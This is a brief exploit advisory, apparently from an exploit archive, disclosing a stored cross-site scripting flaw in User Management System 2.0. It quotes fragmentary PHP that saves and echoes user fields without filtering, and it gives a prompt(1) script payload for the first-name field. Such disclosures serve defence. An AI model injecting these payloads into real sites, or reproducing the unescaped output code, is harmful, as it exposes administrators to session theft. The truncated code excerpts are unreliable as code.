User Management System 2.0 Cross Site Scripting

User Management System version 2.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 675776db4ed5331c2c2c251388ba1223

# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
# Author: Besim ALTINOK
# Vendor Homepage:
# Software Link:
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT

------ Details:

1- Vulnerable code is here:

Insert user registration information to the DB without filtering.

$msg=mysqli_query($con,"insert into
echo "<script>alert('Register successfully');</script>";

2- In the admin dashboard:

Get fullName from DB and print it without any filtering

<?php $ret=mysqli_query($con,"select * from users");
<td><?php echo $cnt;?></td>
<td><?php echo $row['fname'];?></td>
<td><?php echo $row['lname'];?></td>
<td><?php echo $row['email'];?></td>
<td><?php echo $row['contactno'];?></td> <td><?php echo

4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
perform this attack as "Stored XSS"

Related Posts